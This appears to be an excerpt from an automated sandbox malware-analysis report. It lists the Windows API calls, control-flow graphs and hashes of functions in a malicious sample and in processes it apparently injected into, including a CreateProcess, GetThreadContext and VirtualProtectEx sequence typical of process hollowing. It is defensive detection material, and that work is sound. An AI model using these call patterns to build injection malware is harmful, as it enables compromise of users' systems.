                                                                                                                                                                • Snapshot File: hcaresult_13_2_1c0000_bin.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: DeleteFilelstrcat$Sleep
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 588723932-0
                                                                                                                                                                • Opcode ID: cf8439a9f46fc1c5678143b13b51c65cbdf78dca36166c9e79c3ab7667b2c553
                                                                                                                                                                • Instruction ID: c636e14730fe7c8789ea0b8b2e66408bc148dc9e268f550b67392472ade30f33
                                                                                                                                                                • Opcode Fuzzy Hash: cf8439a9f46fc1c5678143b13b51c65cbdf78dca36166c9e79c3ab7667b2c553
                                                                                                                                                                • Instruction Fuzzy Hash: 9441F1715002289FDB22BB618D49FAB77BCEF60705F0444AAEA45E7055DB74DA80CEA1
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 02302A01 Relevance: 9.1, APIs: 6, Instructions: 112stringCOMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 871 2302a01-2302a3e call 2303677 lstrcat call 2302525 call 2302a38 call 2303677 lstrcat 881 2302a44-2302a67 call 2302b71 call 230351b 871->881 885 2302a6c-2302a73 881->885 885->881 886 2302a75-2302a91 call 2303463 call 23026a7 885->886 891 2302a93 886->891 892 2302abe-2302ad5 call 23026a7 886->892 891->892 893 2302a95-2302aaa call 230271d 891->893 898 2302b02-2302b19 call 23026a7 892->898 899 2302ad7 892->899 893->892 901 2302aac 893->901 906 2302b1b 898->906 907 2302b1c-2302b35 call 2302ebb 898->907 899->898 902 2302ad9-2302aee call 230271d 899->902 901->892 904 2302aae-2302ab8 DeleteFileA 901->904 902->898 909 2302af0 902->909 904->892 906->907 913 2302b37-2302b40 call 230307b 907->913 914 2302b58-2302b6c Sleep 907->914 909->898 911 2302af2-2302afc DeleteFileA 909->911 911->898 913->914 917 2302b42-2302b52 DeleteFileA 913->917 914->885 917->914
                                                                                                                                                                APIs
                                                                                                                                                                • lstrcat.KERNEL32(00000000,023029F8), ref: 02302A07
                                                                                                                                                                  • Part of subcall function 02302A38: lstrcat.KERNEL32(00000000,02302A2F), ref: 02302A3E
                                                                                                                                                                  • Part of subcall function 02302A38: DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 02302AB8
                                                                                                                                                                  • Part of subcall function 02302A38: DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 02302AFC
                                                                                                                                                                  • Part of subcall function 02302A38: DeleteFileA.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000001,00000000,00000000,00A00000), ref: 02302B52
                                                                                                                                                                  • Part of subcall function 02302A38: Sleep.KERNEL32(000A012C,00000000,00000000,00000000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000), ref: 02302B66
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.1851135564.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2300000_bin.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: DeleteFile$lstrcat$Sleep
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 4261675396-0
                                                                                                                                                                • Opcode ID: 79bd1a0af3af01ca763be06bdfa33372cb59c75e302318f70dd6acde58cfabce
                                                                                                                                                                • Instruction ID: 3e175e7d30369c0d0d8a4c930082b50f36098063354c314ea3957b83ab27736f
                                                                                                                                                                • Opcode Fuzzy Hash: 79bd1a0af3af01ca763be06bdfa33372cb59c75e302318f70dd6acde58cfabce
                                                                                                                                                                • Instruction Fuzzy Hash: 56411D719002189EDB226B718DDCFAB76BDEF40709F4044A5AE85EA091EE349684CFB5
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 001C29DD Relevance: 9.1, APIs: 6, Instructions: 112stringCOMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 824 1c29dd-1c2a1a call 1c3653 lstrcat call 1c2501 call 1c2a14 call 1c3653 lstrcat 834 1c2a20-1c2a43 call 1c2b4d call 1c34f7 824->834 838 1c2a48-1c2a4f 834->838 838->834 839 1c2a51-1c2a6d call 1c343f call 1c2683 838->839 844 1c2a6f 839->844 845 1c2a9a-1c2ab1 call 1c2683 839->845 844->845 847 1c2a71-1c2a86 call 1c26f9 844->847 850 1c2ade-1c2af5 call 1c2683 845->850 851 1c2ab3 845->851 847->845 855 1c2a88 847->855 860 1c2af8-1c2b11 call 1c2e97 850->860 861 1c2af7 850->861 851->850 853 1c2ab5-1c2aca call 1c26f9 851->853 853->850 862 1c2acc 853->862 855->845 856 1c2a8a-1c2a94 DeleteFileA 855->856 856->845 866 1c2b34-1c2b48 Sleep 860->866 867 1c2b13-1c2b1c call 1c3057 860->867 861->860 862->850 865 1c2ace-1c2ad8 DeleteFileA 862->865 865->850 866->838 867->866 870 1c2b1e-1c2b2e DeleteFileA 867->870 870->866
                                                                                                                                                                APIs
                                                                                                                                                                • lstrcat.KERNEL32(00000000,001C29D4), ref: 001C29E3
                                                                                                                                                                  • Part of subcall function 001C2A14: lstrcat.KERNEL32(00000000,001C2A0B), ref: 001C2A1A
                                                                                                                                                                  • Part of subcall function 001C2A14: DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 001C2A94
                                                                                                                                                                  • Part of subcall function 001C2A14: DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 001C2AD8
                                                                                                                                                                  • Part of subcall function 001C2A14: DeleteFileA.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000001,00000000,00000000,00A00000), ref: 001C2B2E
                                                                                                                                                                  • Part of subcall function 001C2A14: Sleep.KERNEL32(000A012C,00000000,00000000,00000000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000), ref: 001C2B42
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.1849278691.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_1c0000_bin.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: DeleteFile$lstrcat$Sleep
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 4261675396-0
                                                                                                                                                                • Opcode ID: 79bd1a0af3af01ca763be06bdfa33372cb59c75e302318f70dd6acde58cfabce
                                                                                                                                                                • Instruction ID: d6b160bcfa924dc1f1ce780805323c99afb8a852cbc58ab7edcbb3794eecdb08
                                                                                                                                                                • Opcode Fuzzy Hash: 79bd1a0af3af01ca763be06bdfa33372cb59c75e302318f70dd6acde58cfabce
                                                                                                                                                                • Instruction Fuzzy Hash: 8D4130B15002289FDB22BB618D49FAF76BCEF60705F0444AEEA45E7041DB74DA80CEA1
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 02302A38 Relevance: 7.6, APIs: 5, Instructions: 94filesleepstringCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • lstrcat.KERNEL32(00000000,02302A2F), ref: 02302A3E
                                                                                                                                                                  • Part of subcall function 02302B71: Sleep.KERNEL32(00000001,?,452F5000,00000020), ref: 02302C68
                                                                                                                                                                • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 02302AB8
                                                                                                                                                                • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 02302AFC
                                                                                                                                                                • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000001,00000000,00000000,00A00000), ref: 02302B52
                                                                                                                                                                • Sleep.KERNEL32(000A012C,00000000,00000000,00000000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000), ref: 02302B66
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.1851135564.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2300000_bin.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: DeleteFile$Sleep$lstrcat
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 531250245-0
                                                                                                                                                                • Opcode ID: 1956c4aaa65c64439c9b8d6f86777e9786a239e5efddbd3eff6fe4d2a2c1f180
                                                                                                                                                                • Instruction ID: 33202c1bde2b1ea95953efc2afed657c70a56840a0e67648284c6b76edbf86ea
                                                                                                                                                                • Opcode Fuzzy Hash: 1956c4aaa65c64439c9b8d6f86777e9786a239e5efddbd3eff6fe4d2a2c1f180
                                                                                                                                                                • Instruction Fuzzy Hash: 0F311B719002589EDB226E718DDCFAB76BCEF40709F4044A5AE85EA095EE349680CFB0
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 001C2A14 Relevance: 7.6, APIs: 5, Instructions: 94filesleepstringCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • lstrcat.KERNEL32(00000000,001C2A0B), ref: 001C2A1A
                                                                                                                                                                  • Part of subcall function 001C2B4D: Sleep.KERNEL32(00000001,?,452F5000,00000020), ref: 001C2C44
                                                                                                                                                                • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 001C2A94
                                                                                                                                                                • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,00000004,00000000,00000000,00A00000), ref: 001C2AD8
                                                                                                                                                                • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000001,00000000,00000000,00A00000), ref: 001C2B2E
                                                                                                                                                                • Sleep.KERNEL32(000A012C,00000000,00000000,00000000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000,00A00000,00000000,00000000), ref: 001C2B42
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.1849278691.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_1c0000_bin.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: DeleteFile$Sleep$lstrcat
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 531250245-0
                                                                                                                                                                • Opcode ID: 1956c4aaa65c64439c9b8d6f86777e9786a239e5efddbd3eff6fe4d2a2c1f180
                                                                                                                                                                • Instruction ID: 49968fa7a4b5d5aca4da9ad6627b8677a1410d3c3c0f57381d6fd9009df4eb89
                                                                                                                                                                • Opcode Fuzzy Hash: 1956c4aaa65c64439c9b8d6f86777e9786a239e5efddbd3eff6fe4d2a2c1f180
                                                                                                                                                                • Instruction Fuzzy Hash: B9313EB15002699FDB227B618C48FAF76FCEF60705F0044AEEA45E7045DB34DA80CEA0
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 023031EA Relevance: 7.6, APIs: 5, Instructions: 62processstringCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • lstrcat.KERNEL32(00000000,00000000), ref: 0230320E
                                                                                                                                                                • GetStartupInfoA.KERNEL32(00000000), ref: 0230324C
                                                                                                                                                                • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,023031D9,00000011,?,00000000,00000000), ref: 02303279
                                                                                                                                                                • CloseHandle.KERNEL32(?,?,023031D9,00000011,?,00000000,00000000,00000000,02303092,00000004,00000000), ref: 02303285
                                                                                                                                                                • CloseHandle.KERNEL32(?,?,023031D9,00000011,?,00000000,00000000,00000000,02303092,00000004,00000000), ref: 02303291
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.1851135564.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2300000_bin.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CloseHandle$CreateInfoProcessStartuplstrcat
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3387338972-0
                                                                                                                                                                • Opcode ID: f32ac5f5813da37de2e85505615cf9f5e1a16b83960bb8701c11823c1c915505
                                                                                                                                                                • Instruction ID: 35bf88575bd4cdcc39526f0d954a5307ec285f7f27c932c355d61de44610a1bc
                                                                                                                                                                • Opcode Fuzzy Hash: f32ac5f5813da37de2e85505615cf9f5e1a16b83960bb8701c11823c1c915505
                                                                                                                                                                • Instruction Fuzzy Hash: BA1112724005189FDF126B60CC98A9FB7BDEF40705F0145A5A985E6045DA305A80CFA5
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 001C31C6 Relevance: 7.6, APIs: 5, Instructions: 62processstringCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • lstrcat.KERNEL32(00000000,00000000), ref: 001C31EA
                                                                                                                                                                • GetStartupInfoA.KERNEL32(00000000), ref: 001C3228
                                                                                                                                                                • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,001C31B5,00000011,?,00000000,00000000), ref: 001C3255
                                                                                                                                                                • CloseHandle.KERNEL32(?,?,001C31B5,00000011,?,00000000,00000000,00000000,001C306E,00000004,00000000), ref: 001C3261
                                                                                                                                                                • CloseHandle.KERNEL32(?,?,001C31B5,00000011,?,00000000,00000000,00000000,001C306E,00000004,00000000), ref: 001C326D
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.1849278691.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_1c0000_bin.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CloseHandle$CreateInfoProcessStartuplstrcat
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3387338972-0
                                                                                                                                                                • Opcode ID: f32ac5f5813da37de2e85505615cf9f5e1a16b83960bb8701c11823c1c915505
                                                                                                                                                                • Instruction ID: 1a8fcc1b29af6dc6d508c4043910ddb7290efc2c1b1de9f1c1491fbd14d99cd8
                                                                                                                                                                • Opcode Fuzzy Hash: f32ac5f5813da37de2e85505615cf9f5e1a16b83960bb8701c11823c1c915505
                                                                                                                                                                • Instruction Fuzzy Hash: 871121B2504958AFDF12AF60CC45FAF77BCEF60305F0145A9E986EA005DB349A90CEA5
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 001C0B65 Relevance: 6.1, APIs: 4, Instructions: 64threadCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • FindWindowA.USER32(001C0B57,0000000E), ref: 001C0B6A
                                                                                                                                                                • GetWindowThreadProcessId.USER32(00000000,E9000437), ref: 001C0B77
                                                                                                                                                                • OpenProcess.KERNEL32(001F0FFF,00000000), ref: 001C0B84
                                                                                                                                                                • ExitProcess.KERNEL32(00000000,00000000,000008B3), ref: 001C0BA6
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.1849278691.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_1c0000_bin.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Process$Window$ExitFindOpenThread
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 273847653-0
                                                                                                                                                                • Opcode ID: 34cd6c9929bffda1e26e0ee6370170bb4b231b10a00d7b4531b927594a56342a
                                                                                                                                                                • Instruction ID: a9338b71442d5d3ebf48e46985c07ff31f3dafee2d3b1c7779650113a65b08a8
                                                                                                                                                                • Opcode Fuzzy Hash: 34cd6c9929bffda1e26e0ee6370170bb4b231b10a00d7b4531b927594a56342a
                                                                                                                                                                • Instruction Fuzzy Hash: CE11EF25204301AEEF136BB08D56F663F28AF36B00F0A419DF8449E0A3DB20C9429A38
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 02303F31 Relevance: 6.0, APIs: 4, Instructions: 26sleepCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • GetModuleHandleA.KERNEL32(00000000,00000000,?,02303F27,0000000A,E8FFFF1B,00000000,0000000A), ref: 02303F51
                                                                                                                                                                • Sleep.KERNEL32(000003E8,00000000,?,02303F27,0000000A,E8FFFF1B,00000000,0000000A), ref: 02303F6F
                                                                                                                                                                • Sleep.KERNEL32(000007D0), ref: 02303F7F
                                                                                                                                                                • Sleep.KERNEL32(00000BB8), ref: 02303F8F
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.1851135564.0000000002300000.00000040.00001000.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_2300000_bin.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Sleep$HandleModule
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3646095425-0
                                                                                                                                                                • Opcode ID: e04edd3b56a3ae2e38138ccc1fa4ca0e34bf568aa8a0740690bb103294f382c8
                                                                                                                                                                • Instruction ID: 901d359099c71e630482be16dab5d5e572698b98821eb063051bc619bddaf5a8
                                                                                                                                                                • Opcode Fuzzy Hash: e04edd3b56a3ae2e38138ccc1fa4ca0e34bf568aa8a0740690bb103294f382c8
                                                                                                                                                                • Instruction Fuzzy Hash: 8CF01C705543509AFB603BB08CECA4A3AB9AF00705F0400D2AA89BE4D6CF7491508E75
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 001C3EC3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 39libraryCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • LoadLibraryA.KERNEL32(001C3EBD,00000006,E8FFFE1B,00000000), ref: 001C3EC8
                                                                                                                                                                • GetModuleHandleA.KERNEL32(00000000,00000000,?,001C3F03,0000000A,E8FFFF1B,00000000,0000000A), ref: 001C3F2D
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000D.00000002.1849278691.00000000001C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_13_2_1c0000_bin.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: HandleLibraryLoadModule
                                                                                                                                                                • String ID: j
                                                                                                                                                                • API String ID: 4133054770-2747090070
                                                                                                                                                                • Opcode ID: 99f70bd6b06b53a7fd6d28a083be50230d299d6762310f15b5c168a6665c2821
                                                                                                                                                                • Instruction ID: c4430a2c0c24a2b0bdc06aa21888522cca28319f24652424d60ea3f5ea681fdb
                                                                                                                                                                • Opcode Fuzzy Hash: 99f70bd6b06b53a7fd6d28a083be50230d299d6762310f15b5c168a6665c2821
                                                                                                                                                                • Instruction Fuzzy Hash: BEF0C871948250AEEB127A708855FAE32BCAF70701F00C45DBA95DA041DF30C740DAB7
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Executed Functions

                                                                                                                                                                Function 00AB0811 Relevance: 3.1, APIs: 2, Instructions: 111threadCOMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000000F.00000002.2887276174.0000000000AB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00AB0000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_15_2_ab0000_RuntimeBroker.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ExitSleepThreadUser
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3375650085-0
                                                                                                                                                                • Opcode ID: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
                                                                                                                                                                • Instruction ID: a746e57cf6378d43ca32d6e26f47fe512de4d0868098c976c8f9b264cff3b5ab
                                                                                                                                                                • Opcode Fuzzy Hash: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
                                                                                                                                                                • Instruction Fuzzy Hash: 0B31C8724102046FEB017FB09E46EFB3BACEF11310F440165BD85DA0A7EA744A658AB5
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Executed Functions

                                                                                                                                                                Function 00291D5A Relevance: 4.6, APIs: 3, Instructions: 123memoryCOMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000010.00000002.2884416308.0000000000290000.00000040.00000001.00020000.00000000.sdmp, Offset: 00290000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_16_2_290000_smartscreen.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Virtual$Protect$Alloc
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2541858876-0
                                                                                                                                                                • Opcode ID: d4c8ab3f009f1a42ba1f4b1f1ca1d2215188908ad26b68096351dda695124fe0
                                                                                                                                                                • Instruction ID: 5cfeb1bcbae8c558e98dcdee69f702b75d149b9acfc2b5526b48693fa100539d
                                                                                                                                                                • Opcode Fuzzy Hash: d4c8ab3f009f1a42ba1f4b1f1ca1d2215188908ad26b68096351dda695124fe0
                                                                                                                                                                • Instruction Fuzzy Hash: F421F730B34C1E0BEF58A67D9859764F6D2E79C320F980295E90DD36E8ED58CC9187C6
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 00290811 Relevance: 3.1, APIs: 2, Instructions: 111threadCOMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000010.00000002.2884416308.0000000000290000.00000040.00000001.00020000.00000000.sdmp, Offset: 00290000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_16_2_290000_smartscreen.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ExitSleepThreadUser
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3375650085-0
                                                                                                                                                                • Opcode ID: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
                                                                                                                                                                • Instruction ID: c058b29fad30e67ee3f8ad258c7953d0322cd43e49dbed41448cb6062d2459d6
                                                                                                                                                                • Opcode Fuzzy Hash: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
                                                                                                                                                                • Instruction Fuzzy Hash: 9A31E872520209BFEF017F709D86ABA77ACFF11300F400165BD85DA0A6DA744D74CAB5
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Executed Functions

                                                                                                                                                                Function 00580811 Relevance: 3.1, APIs: 2, Instructions: 111threadCOMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000013.00000002.2879902182.0000000000580000.00000040.00000001.00020000.00000000.sdmp, Offset: 00580000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_19_2_580000_TextInputHost.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ExitSleepThreadUser
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3375650085-0
                                                                                                                                                                • Opcode ID: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
                                                                                                                                                                • Instruction ID: ad2bcb2392a4eecc8ec5ac587f61150cc7b45fc580965541663a43ffb8525291
                                                                                                                                                                • Opcode Fuzzy Hash: 992149f37510bf435a63d6c026afa7e5196d855f937f02806c44f21d9357a639
                                                                                                                                                                • Instruction Fuzzy Hash: 8131C3720006056FEF417B709D4AABA7FACFF51310F001165BD85EA0E2EA7449A98BB6
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Executed Functions

                                                                                                                                                                Function 022A0005 Relevance: 2.6, APIs: 1, Instructions: 1116COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 022A098B: OpenMutexA.KERNEL32(001F0001,00000000,00000000), ref: 022A09A5
                                                                                                                                                                  • Part of subcall function 022A098B: GetStartupInfoA.KERNEL32(00000000), ref: 022A09BD
                                                                                                                                                                • ExitProcess.KERNEL32(00000000), ref: 022A001D
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000014.00000002.1929524044.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_20_2_22a0000_bin.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ExitInfoMutexOpenProcessStartup
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 213680645-0
                                                                                                                                                                • Opcode ID: 8ded0c1563596ef065c873257d9f166c149bbeaf12971adc1d4101d8be03d7fe
                                                                                                                                                                • Instruction ID: a68358f380a96d612f0cb8167b0cfc63c9d4dd549bf7c762d647430277cdcda5
                                                                                                                                                                • Opcode Fuzzy Hash: 8ded0c1563596ef065c873257d9f166c149bbeaf12971adc1d4101d8be03d7fe
                                                                                                                                                                • Instruction Fuzzy Hash: 9C72006142E3C14FD7279BE44A74BA57F78BF03308B0910CBC5819E8BBD6649B09C76A
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 021F0000 Relevance: 21.4, APIs: 3, Strings: 9, Instructions: 395memoryCOMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000014.00000002.1929115712.00000000021F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 021F0000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_20_2_21f0000_bin.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ProtectVirtual
                                                                                                                                                                • String ID: $1;$@$C[$R$d:$wJ$y7$v
                                                                                                                                                                • API String ID: 544645111-3459585926
                                                                                                                                                                • Opcode ID: 53f4e89c0dc9a16f3c8cd647b3aa6a18b2ce076b07f4b3090f74fc473a9225f3
                                                                                                                                                                • Instruction ID: 28e5be904831581971660279813b2c29e89ec9c6c7ba3c7a11617b115dd6d7d6
                                                                                                                                                                • Opcode Fuzzy Hash: 53f4e89c0dc9a16f3c8cd647b3aa6a18b2ce076b07f4b3090f74fc473a9225f3
                                                                                                                                                                • Instruction Fuzzy Hash: 9F3277B8E012688BDB64CF68C890BDDBBB1BF49304F1481DAD848A7341D775AE85CF95
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 001C093E Relevance: 18.1, APIs: 12, Instructions: 134sleepthreadCOMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                APIs
                                                                                                                                                                • Sleep.KERNEL32(00001388), ref: 001C0959
                                                                                                                                                                • RtlExitUserThread.NTDLL(00000000), ref: 001C0961
                                                                                                                                                                • OpenMutexA.KERNEL32(001F0001,00000000,00000000), ref: 001C0981
                                                                                                                                                                • GetStartupInfoA.KERNEL32(00000000), ref: 001C0999
                                                                                                                                                                  • Part of subcall function 001C09D9: CreateProcessA.KERNEL32(00000000,001C09D2,00000007,E8FFFF1F,E8FFFBFB,00000000,00000000,00000000,00000004,00000000,00000000,E8FFFC3F,00000000), ref: 001C09E0
                                                                                                                                                                  • Part of subcall function 001C09D9: GetThreadContext.KERNEL32(?,00000000), ref: 001C0A08
                                                                                                                                                                  • Part of subcall function 001C09D9: VirtualProtectEx.KERNEL32(?,?,000000EB,00000040,00000000), ref: 001C0A33
